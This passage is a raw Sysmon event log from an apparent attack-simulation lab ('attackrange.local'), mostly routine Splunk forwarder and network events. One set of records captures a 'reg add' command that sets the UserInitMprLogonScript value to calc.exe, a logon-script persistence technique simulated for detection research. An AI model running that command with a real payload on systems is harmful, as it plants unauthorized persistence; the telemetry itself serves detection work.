Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.112{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAE90D0F4F95B517CA92E00CC22B4FB,SHA256=2927EE94279E256F924879C4F06A618A835681DDAABB3B8785A9314EECF1771B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.311{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59773-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.116{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52875-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:29.652{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EA16316CD5AECB7E2B001CD82A872C6,SHA256=7F53B82AF762EE8366A0FDCAD9AEA28BB8D90C7E49D0ED7E3A6C2F083C25A9E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:29.831{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AA2F5C36DB3333651CA5CB64BAAE9E8,SHA256=1A4E0209D49A296663CD1917631D4B506B148C4576B06C60D56A5E26FD58CCC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:29.362{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D583661A7700D2725D03C080613A7A8,SHA256=920DFDAF99423BFFA9334FE6A4412368CB9E302DE0B8A9FF682F963DA4C18BFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.669{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35B0BFB33173018F98CFDA97A2009D2,SHA256=90C10905DC42C05DC548C30870F9A1B7F92158C8ACAF1DB06D762EDE58B9C966,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:30.393{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C41214317FBE485349373F2CCADD5714,SHA256=15C97176491C507129CDC50DA184040CCEE6054F560EBE325101AF2435689441,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:18:30.385{5EBD8912-8C66-6151-647A-00000000FC01}664C:\Windows\system32\reg.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Environment\UserInitMprLogonScriptC:\Windows\System32\calc.exe 10341000x80000000000000001051833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-85DC-6151-8C79-00000000FC01}326360C:\Windows\system32\conhost.exe{5EBD8912-8C66-6151-647A-00000000FC01}664C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-79BB-6151-D077-00000000FC01}46124936C:\Windows\system32\csrss.exe{5EBD8912-8C66-6151-647A-00000000FC01}664C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.369{5EBD8912-85DC-6151-8B79-00000000FC01}42205168C:\Windows\system32\cmd.exe{5EBD8912-8C66-6151-647A-00000000FC01}664C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:30.381{5EBD8912-8C66-6151-647A-00000000FC01}664C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d C:\Windows\System32\calc.exeC:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{5EBD8912-79BE-6151-7ED6-4A0400000000}0x44ad67e2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon" 23542300x80000000000000001051837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:31.670{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF46688E68E8C0F37FD43ED9558BABB5,SHA256=2D7F92107E01E49A9BC4156A402C986887154C5CFA61F7F4C93B9E03944255E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.735{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59464-false10.0.1.12-8000- 23542300x8000000000000000980227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:31.628{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95FF140B1B7DE427D2D58DF9FE0A73CC,SHA256=641487381CBA68B8480CC40F06CDCB9D49E46E0DFC5B6CB8F76E1590F9AC88CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:31.370{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69BF5D81F2D91B1BDED529CA3B6E2B5B,SHA256=A7C966FCD874F44E65690FA57E9724AF714E3FB0F06DB00BB5BBDE5E913AC3A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:32.685{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1441BB3E7405E6F6848EC68FA6D4400,SHA256=F24FF2321016D11D681623AF3192BE4E6813D6FB1B06FF6E292F76ED910427EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:32.659{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A46B21BBA71AFBFB567DC8D61AEBBE69,SHA256=D4E87819626D9E9011312B061E9553E4B547C57D9F60530C3F9E9406870C22EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:32.581{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5AAD219F88143CE00B7FDCB4D93CCC3C,SHA256=4ABFAD0DBCDFD75402469A768D0694747849B3CCDA68A320983C643D23CC3138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:33.675{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=781B7E33AD03EEE7E25F5BC7958F6B48,SHA256=06BA7107B45BC2F9AD0061A0AA58AD4439AC1B6C9A230340A6D38FAD861AC130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:33.715{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007E07AFC8B04EBB3421F42592225A9E,SHA256=CCFC0F385B16C31C7D45F806AAE60572E489D2ED6BF1B1C8EBBFC90AD69CB1E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:34.690{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=525DF3506246F4B8FAFEC5DD81504080,SHA256=0463FB8110E80F43090CDF490AA084DEDCD2751C83338EC176DDF4897A74EDA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:34.729{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23BFB73DFD88F1B2E1DDB1A2DEA01787,SHA256=9B18B210B855FE50F120FDB7B4199E047EE131D358CEB07272C0737B10459030,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:31.739{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53477-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000980233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:35.706{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3326C6241C7E49262740BD99C9215F6,SHA256=5461F149F9C56B00C30086356C187D5D78EBC27AD524522C166B7D3FA5E6325F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:35.746{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D1D0115D437E9B56D3588D6B8865DA,SHA256=FB57385F206E374DA07CBEB2825C97EB73D2073503DD6E22019B1167CD8520C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:33.875{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59465-false10.0.1.12-8000- 354300x8000000000000000980237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:33.717{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65220-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:36.721{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32649B9FFC3871F1C1032FEC2992430E,SHA256=E61C8FE3CE3E1C2BC8F00F530D31445EB495C5E35172EB6DCA11DA5C15C563F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.980{5EBD8912-79C0-6151-E577-00000000FC01}42962992C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.980{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.980{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.964{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.964{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.796{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:36.765{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C402B64BF16455DF5670B17C962C0E,SHA256=835360F021F49110D6831E6C1F130221BD1DCE5C7F5840AE057281A81F9EC8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:36.471{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A0FEE9FEFD4C919F95B3AE237924966,SHA256=2B1C7842EDAD81427828DD96E2C17C8C44370F6B10B826994C6950C40E846CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:36.471{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C618B50567F1A4219CEEA4522350BA34,SHA256=2D972F0C62C055B4A7B6437D5A6C5D27FCCAAA633733D88990D32725077B309B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.956{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A0FEE9FEFD4C919F95B3AE237924966,SHA256=2B1C7842EDAD81427828DD96E2C17C8C44370F6B10B826994C6950C40E846CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:37.737{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B1CCB407A17F52BD4CFB85ADF47754,SHA256=4014AFB82D7BDC5FF49ED6ED7049C98562991A0FCB137E1DA68ED2A506DA6CD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:37.765{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 